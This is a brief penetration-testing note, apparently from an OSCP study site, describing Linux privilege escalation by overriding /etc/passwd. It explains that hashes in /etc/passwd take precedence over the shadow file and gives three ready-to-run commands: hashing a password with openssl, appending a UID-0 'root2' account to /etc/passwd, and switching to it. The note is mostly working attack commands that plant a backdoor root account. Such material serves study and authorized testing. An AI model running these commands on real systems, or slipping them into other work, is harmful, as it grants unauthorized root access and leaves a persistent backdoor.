// notes/ PrivEsc — Linux
🐧
Etc Passwd Override
For backwards compatibility, password hashes present in /etc/passwd will override the ones stored in the shadow file. If we have write access to /etc/passwd we can simply add a ne…
#linux privilege escalation#adot8
source · oscp.adot8.com · linux-privilege-escalation/etc-passwd-override ↗/etc/passwd override
For backwards compatibility, password hashes present in /etc/passwd will override the ones stored in the shadow file. If we have write access to /etc/passwd we can simply add a new root account
code
01openssl passwd adot8code
01echo "root2:HASH:0:0:root:/bin/bash" >> /etc/passwdcode
01su root2